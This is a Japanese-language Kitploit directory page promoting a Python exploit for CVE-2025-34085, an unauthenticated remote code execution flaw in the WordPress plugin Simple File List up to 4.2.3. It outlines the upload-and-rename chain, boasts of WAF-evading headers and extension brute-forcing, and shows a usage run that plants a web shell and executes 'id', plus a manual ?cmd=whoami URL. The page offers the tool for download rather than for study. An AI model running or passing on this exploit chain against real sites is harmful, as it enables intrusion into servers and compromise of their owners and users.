Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-34085 — Simple File List – 認証不要のRCEエクスプロイト (CVE-2025-34085) | Kitploit
ツール/GitHubGitHub/mrjhaxcore/cve-2025-34085
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubmrjhaxcore/cve-2025-34085

CVE-2025-34085

Simple File List – 認証不要のRCEエクスプロイト (CVE-2025-34085)

リポジトリを見る
121年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

📂 Simple File List – 未認証RCEエクスプロイト (CVE-2025-34085)

⚠️ エクスプロイトコード作成者: Mrj Haxcore

WordPressプラグイン Simple File List (バージョン4.2.3以下) 用の完全に動作するPythonエクスプロイトです。このプラグインは、安全でないファイルアップロードおよびリネームロジックにより、未認証リモートコード実行 (RCE) の脆弱性があります。


💣 脆弱性概要

  • プラグイン: Simple File List (simple-file-list)
  • バージョン: <= 4.2.3
  • CVE: CVE-2025-34085
  • 影響: 未認証のユーザーが .png に見せかけたPHPファイルをアップロードし、.php にリネームして任意のコードを実行できます。
  • 必要条件: 認証不要
  • エクスプロイトタイプ: ファイルアップロード → リネームバイパス → コマンド実行

✅ 機能

  • 🚀 完全自動化されたエクスプロイトチェーン
  • 📤 手動 multipart/form-data ビルダー (415エラーをバイパス)
  • 🔁 .php, .php5, .phtml 等へのリネームブルートフォース
  • 🛡️ WAFをバイパスする現実的な偽装ヘッダー
  • 🐚 ?cmd= によるコマンド実行
  • 🧼 クリーンな出力 (�PNG ゴミなし)

🛠 使用方法

root@kitploit:~
python3 simple.py https://target.site

[+] Uploading shell as 8dkls0qp.png...
[+] Upload successful.
[+] Trying to rename to: 8dkls0qp.php...
[+] Rename successful: 8dkls0qp.php
[+] Triggering shell: https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
[+] Shell output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

手動アクセス

https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami
ツールをダウンロード